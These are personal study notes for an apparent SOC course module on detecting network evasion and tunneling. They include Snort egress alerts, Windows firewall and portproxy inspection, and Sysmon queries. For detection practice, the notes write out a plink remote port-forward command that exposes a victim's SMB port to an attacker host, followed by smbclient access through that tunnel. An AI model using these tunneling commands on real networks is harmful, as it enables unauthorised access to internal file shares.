Tree's Notes
  • Overview
  • Tools & Cheatsheets
  • Hacking Methodology
  • Hands-on Practice
  • Linux
    • Linux Basics
  • Windows
    • Windows Basics
  • MacOS
    • MacOS Basics
  • Web
    • Web Basics
  • Mobile
    • iOS
    • Android
  • OS Agnostic
    • Template
  • Courses
    • Hack The Box
      • Bug Bounty Hunter
        • Module 1: Web Requests
        • Module 2: Introduction to Web Applications
        • Module 3: Using Web Proxies
        • Module 4: Information Gathering - Web Edition
        • Module 5: Attacking Web Applications with Ffuf
        • Module 6: JavaScript Deobfuscation
        • Module 7: Cross-Site Scripting (XSS)
        • Module 8: SQL Injection Fundamentals
        • Module 9: SQLMap Essentials
        • Module 10: Command Injections
        • Module 11: File Upload Attacks
        • Module 12: Server-Side Attacks
        • Module 13: Login Brute Forcing
        • Module 14: Broken Authentication
        • Module 15: Web Attacks
        • Module 16: File Inclusion
        • Module 17: Session Security
        • Module 18: Web Service & API Attacks
        • Module 19: Hacking Wordpress
        • Module 20: Bug Bounty Hunting Process
    • OffSec
      • 🦊EXP-301
        • Module 1: Windows User Mode Exploit Development: General Course Information
        • Module 2: WinDbg and x86 Architecture
        • Module 3: Exploiting Stack Overflows
        • Module 4: Exploiting SEH Overflows
        • Module 5: Introduction to IDA Pro
        • Module 6: Overcoming Space Restrictions: Egghunters
        • Module 7: Creating Custom Shellcode
        • Module 8: Reverse Engineering for Bugs
        • Module 9: Stack Overflows and DEP Bypass
        • Module 10: Stack Overflows and ASLR Bypass
        • Module 11: Format String Specifier Attack Part I
        • Module 12: Format String Specifier Attack Part II
        • Module 13: Trying Harder: The Labs
      • 🐙EXP-312
        • Module 1: macOS Control Bypasses: General Course Information
        • Module 2: Virtual Machine Setup Guide
        • Module 3: Introduction to macOS
        • Module 4: macOS Binary Analysis Tools
        • Module 5: The Art of Crafting Shellcodes
        • Module 6: The Art of Crafting Shellcodes (Apple Silicon Edition)
        • Module 7: Dylib Injection
        • Module 8: The Mach Microkernel
        • Module 9: XPC Attacks
        • Module 10: Function Hooking on macOS
        • Module 11: The macOS Sandbox
        • Module 12: Bypassing Transparency, Consent, and Control (Privacy)
        • Module 13: GateKeeper Internals
        • Module 14: Bypassing GateKeeper
        • Module 15: Symlink and Hardlink Attacks
        • Module 16: Injecting Code into Electron Applications
        • Module 17: Getting Kernel Code Execution
        • Module 18: Mach IPC Exploitation
        • Module 19: macOS Penetration Testing
        • Module 20: Chaining Exploits on macOS Ventura
        • Module 21: Mount(ain) of Bugs (archived)
      • ⚓IR-200
        • Module 1: Incident Response Overview
        • Module 2: Fundamentals of Incident Response
        • Module 3: Phases of Incident Response
        • Module 4: Incident Response Communication Plans
        • Module 5: Common Attack Techniques
        • Module 6: Incident Detection and Identification
        • Module 7: Initial Impact Assessment
        • Module 8: Digital Forensics for Incident Responders
        • Module 9: Incident Response Case Management
        • Module 10: Active Incident Containment
        • Module 11: Incident Eradication and Recovery
        • Module 12: Post-Mortem Reporting
        • Module 13: Incident Response Challenge Labs
      • 🐉PEN-103
      • 🐲PEN-200
        • Module 1: Copyright
        • Module 2: Penetration Testing with Kali Linux: General Course Information
        • Module 3: Introduction to Cybersecurity
        • Module 4: Effective Learning Strategies
        • Module 5: Report Writing for Penetration Testers
        • Module 6: Information Gathering
        • Module 7: Vulnerability Scanning
        • Module 8: Introduction to Web Application Attacks
        • Module 9: Common Web Application Attacks
        • Module 10: SQL Injection Attacks
        • Module 11: Client-side Attacks
        • Module 12: Locating Public Exploits
        • Module 13: Fixing Exploits
        • Module 14: Antivirus Evasion
        • Module 15: Password Attacks
        • Module 16: Windows Privilege Escalation
        • Module 17: Linux Privilege Escalation
        • Module 18: Port Redirection and SSH Tunneling
        • Module 19: Tunneling Through Deep Packet Inspection
        • Module 20: The Metasploit Framework
        • Module 21: Active Directory Introduction and Enumeration
        • Module 22: Attacking Active Directory Authentication
        • Module 23: Lateral Movement in Active Directory
        • Module 24: Enumerating AWS Cloud Infrastructure
        • Module 25: Attacking AWS Cloud Infrastructure
        • Module 26: Assembling the Pieces
        • Module 27: Trying Harder: The Challenge Labs
      • 🛜PEN-210
        • Module 1: IEEE 802.11
        • Module 2: Wireless Networks
        • Module 3: Wi-Fi Encryption
        • Module 4: Linux Wireless Tools, Drivers, and Stacks
        • Module 5: Wireshark Essentials
        • Module 6: Frames and Network Interaction
        • Module 7: Aircrack-ng Essentials
        • Module 8: Cracking Authentication Hashes
        • Module 9: Attacking WPS Networks
        • Module 10: Rogue Access Points
        • Module 11: Attacking Captive Portals
        • Module 12: Attacking WPA Enterprise
        • Module 13: bettercap Essentials
        • Module 14: Determining Chipsets and Drivers
        • Module 15: Kismet Essentials
        • Module 16: Manual Network Connections
      • 🔗PEN-300
        • Module 1: Evasion Techniques and Breaching Defenses: General Course Information
        • Module 2: Operating System and Programming Theory
        • Module 3: Client Side Code Execution With Office
        • Module 4: Phishing with Microsoft Office
        • Module 5: Client Side Code Execution With Windows Script Host
        • Module 6: Reflective PowerShell
        • Module 7: Process Injection and Migration
        • Module 8: Introduction to Antivirus Evasion
        • Module 9: Advanced Antivirus Evasion
        • Module 10: Application Whitelisting
        • Module 11: Bypassing Network Filters
        • Module 12: Linux Post-Exploitation
        • Module 13: Kiosk Breakouts
        • Module 14: Windows Credentials
        • Module 15: Windows Lateral Movement
        • Module 16: Linux Lateral Movement
        • Module 17: Microsoft SQL Attacks
        • Module 18: Active Directory Exploitation
        • Module 19: Attacking Active Directory
        • Module 20: Combining the Pieces
        • Module 21: Trying Harder: The Labs
      • ⚛️SEC-100
      • 🛡️SOC-200
        • Module 1: Introduction to SOC-200
        • Module 2: Attacker Methodology Introduction
        • Module 3: Windows Endpoint Introduction
        • Module 4: Windows Server Side Attacks
        • Module 5: Windows Client-Side Attacks
        • Module 6: Windows Privilege Escalation
        • Module 7: Windows Persistence
        • Module 8: Linux Endpoint Introduction
        • Module 9: Linux Server Side Attacks
        • Module 10: Linux Privilege Escalation
        • Module 11: Network Detections
        • Module 12: Antivirus Alerts and Evasion
        • Module 13: Active Directory Enumeration
        • Module 14: Network Evasion and Tunneling
        • Module 15: Windows Lateral Movement
        • Module 16: Active Directory Persistence
        • Module 17: SIEM Part One: Intro to ELK
        • Module 18: SIEM Part Two: Combining the Logs
        • Module 19: Trying Harder: The Labs
      • TH-200
        • Module 1: Threat Hunting Concepts and Practices
        • Module 2: Threat Actor Landscape Overview
        • Module 3: Communication and Reporting for Threat Hunters
        • Module 4: Hunting With Network Data
        • Module 5: Hunting on Endpoints
        • Module 6: Theat Hunting Without IoCs
        • Module 7: Threat Hunting Challenge Labs
      • 🦉WEB-200
        • Module 1: Introduction to WEB-200
        • Module 2: Tools (archived)
        • Module 3: Web Application Enumeration Methodology
        • Module 4: Introduction to Burp Suite
        • Module 5: Cross-Site Scripting Introduction and Discovery
        • Module 6: Cross-Site Scripting Exploitation and Case Study
        • Module 7: Cross-Origin Attacks
        • Module 8: Introduction to SQL
        • Module 9: SQL Injection
        • Module 10: Directory Traversal Attacks
        • Module 11: XML External Entities
        • Module 12: Server-side Template Injection - Discovery and Exploitation
        • Module 13: Command Injection
        • Module 14: Server-side Request Forgery
        • Module 15: Insecure Direct Object Referencing
        • Module 16: Assembling the Pieces: Web Application Assessment Breakdown
      • 🕷️WEB-300
        • Module 1: Introduction
        • Module 2: Tools & Methodologies
        • Module 3: ManageEngine Applications Manager AMUserResourcesSyncServlet SSQL Injection RCE
        • Module 4: DotNetNuke Cookie Deserialization RCE
        • Module 5: ERPNext Authentication Bypass and Remote Code Execution
        • Module 6: openCRX Authentication Bypass and Remote Code Execution
        • Module 7: openITCOCKPIT XSS and OS Command Injection - Blackbox
        • Module 8: Concord Authentication Bypass to RCE
        • Module 9: Server-Side Request Forgery
        • Module 10: Guacamole Lite Prototype Pollution
        • Module 11: Dolibarr Eval Filter Bypass RCE
        • Module 12: RudderStack SQLi and Coraza WAF Bypass
        • Module 13: Conclusion
        • Module 14: ATutor Authentication Bypass and RCE (archived)
        • Module 15: ATutor LMS Type Juggling Vulnerability (archived)
        • Module 16: Atmail Mail Server Appliance: from XSS to RCE (archived)
        • Module 17: Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability (archived)
    • SANS
      • FOR572
Powered by GitBook
On this page
  • Network Segmentation
  • Network Segmentation Concepts and Benefits
  • Segmentation Theory
  • Egress Busting
  • Detecting Egress Busting
  • Port Forwarding and Tunneling
  • Port Forwarding and Tunneling Theory
  • Port Forwarding and Tunneling in Practice
Edit on GitHub
  1. Courses
  2. OffSec
  3. SOC-200

Module 14: Network Evasion and Tunneling

Network Segmentation

Network Segmentation Concepts and Benefits

Concepts. Google/Wikipedia it.

Segmentation Theory

Concepts. Google/Wikipedia it.

Egress Busting

Detecting Egress Busting

Snort alerts generated by the egress busting attack

offsec@snort02:~$ tail /var/log/snort/alert_fast.txt 
01/28-21:15:49.133529 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50167 -> 192.168.48.4:491
01/28-21:15:49.149038 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50168 -> 192.168.48.4:492
01/28-21:15:49.164680 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50169 -> 192.168.48.4:493
01/28-21:15:49.180393 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50170 -> 192.168.48.4:494
01/28-21:15:49.195977 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50171 -> 192.168.48.4:495
01/28-21:15:49.211640 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50172 -> 192.168.48.4:496
01/28-21:15:49.227126 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50173 -> 192.168.48.4:497
01/28-21:15:49.242844 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50174 -> 192.168.48.4:498
01/28-21:15:49.258451 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50175 -> 192.168.48.4:499
01/28-21:15:49.274751 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50176 -> 192.168.48.4:500

Port Forwarding and Tunneling

Port Forwarding and Tunneling Theory

Port Forwarding and Tunneling in Practice

Reading the Windows Firewall With Advanced Security/Firewall Event Log

PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{LogName = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'} -MaxEvents 20

   ProviderName: Microsoft-Windows-Windows Firewall With Advanced Security

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
1/31/2022 10:03:01 PM         2008 Information      Windows Defender Firewall Group Policy settings have changed. The new settings have been applied
1/31/2022 9:58:43 PM          2004 Information      A rule has been added to the Windows Defender Firewall exception list....

Listing all the inbound firewall rules

PS C:\Users\Administrator> Get-NetFirewallRule -Direction Inbound | Select-Object -Property DisplayName,Profile,Enabled | Where { $_.Enabled -eq 'True'}

DisplayName                                                                                Profile Enabled
-----------                                                                                ------- -------
...
Cortana                                                                            Domain, Private    True
Network Discovery (Pub-WSD-In)                                                             Private    True
Network Discovery (LLMNR-UDP-In)                                                           Private    True
Network Discovery (WSD-In)                                                                 Private    True
Network Discovery (SSDP-In)                                                                Private    True
Network Discovery (WSD Events-In)                                                          Private    True
Network Discovery (WSD EventsSecure-In)                                                    Private    True
Network Discovery (NB-Datagram-In)                                                         Private    True
Network Discovery (NB-Name-In)                                                             Private    True
Network Discovery (UPnP-In)                                                                Private    True
Desktop App Web Viewer                                                     Domain, Private, Public    True
forward_port_rule                                                                              Any    True

Getting detailed information usin the rule name

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule"

Name                  : {F55666F7-6A7C-4049-BEE6-CD7407E7120A}
DisplayName           : forward_port_rule
Description           :
DisplayGroup          :
Group                 :
Enabled               : True
Profile               : Any
Platform              : {}
Direction             : Inbound
Action                : Allow
EdgeTraversalPolicy   : Block
LooseSourceMapping    : False
LocalOnlyMapping      : False
Owner                 :
PrimaryStatus         : OK
Status                : The rule was parsed successfully from the store. (65536)
EnforcementStatus     : NotApplicable
PolicyStoreSource     : PersistentStore
PolicyStoreSourceType : Local

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule" | Get-NetFirewallPortFilter

Protocol      : TCP
LocalPort     : 21
RemotePort    : Any
IcmpType      : Any
DynamicTarget : Any

Inspecting the configuration of the portproxy interface using netsh

PS C:\Users\Administrator> netsh interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
172.16.50.11    21          172.16.50.12    3306

Remote port forwarding using plink.exe

echo y | plink.exe -ssh -N -l kali -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2

Confirming port forward is setup

kali@attacker01:~ $ ss -antp | grep 1234
 State     Recv-Q     Send-Q     Local Address:Port   Peer Address:Port     Process                                                                                                                                                                                                 
LISTEN    0          128        127.0.0.1:1234       0.0.0.0:*             users:(("sshd",pid=2801,fd=10))

Accessing the network shares usin smbclient

kali@attacker01:~ $ smbclient -L 127.0.0.1 --port=1234 --user=Administrator
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        htdocs          Disk      
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Listing the Sysmon event logs while filtering for the plink string in the Message

PS C:\Users\Administrator> Get-SysmonEvent | Where-Object { $_.Message -like "*plink*" }

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
2/1/2022 12:02:39 AM             1 Information      Process Create:...
2/1/2022 12:00:59 AM             5 Information      Process terminated:...
1/31/2022 11:47:42 PM            1 Information      Process Create:...
1/31/2022 11:47:34 PM            5 Information      Process terminated:...
1/31/2022 11:47:34 PM            1 Information      Process Create:...
1/31/2022 11:47:19 PM            5 Information      Process terminated:...
1/31/2022 11:47:19 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...

Getting detailed infromation from the Sysmon event logs

PS C:\Users\Administrator> Get-SysmonEvent 1 "1/31/2022 11:46:12" "2/1/2022 12:02:39" | Where-Object { $_.Message -like "*plink*" } | Format-List
...
TimeCreated  : 2/1/2022 12:02:39 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2022-02-01 08:02:39.016
               ProcessGuid: {6c804c53-e91f-61f8-9b00-000000002500}
               ProcessId: 7592
               Image: C:\xampp\htdocs\simple_upload\uploaded_files\plink.exe
               FileVersion: Release 0.76
               Description: Command-line SSH, Telnet, and Rlogin client
               Product: PuTTY suite
               Company: Simon Tatham
               OriginalFileName: Plink
               CommandLine: plink.exe  -ssh -N -l root -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2
               CurrentDirectory: C:\xampp\htdocs\simple_upload\uploaded_files\
               User: SERVER03\Administrator
               LogonGuid: {6c804c53-e8ec-61f8-069f-060000000000}
               LogonId: 0x69F06
               TerminalSessionId: 2
               IntegrityLevel: High
               Hashes: SHA256=828E81AA16B2851561FFF6D3127663EA2D1D68571F06CBD732FDF5672086924D
               ParentProcessGuid: {6c804c53-e8f5-61f8-8f00-000000002500}
               ParentProcessId: 656
               ParentImage: C:\Windows\System32\cmd.exe
               ParentCommandLine: "C:\Windows\system32\cmd.exe"
               ParentUser: SERVER03\Administrator
...
PreviousModule 13: Active Directory EnumerationNextModule 15: Windows Lateral Movement

Last updated 3 months ago

🛡️
Local forwarding / tunneling
Remote forwarding / tunneling
Dynamic forwarding / tunneling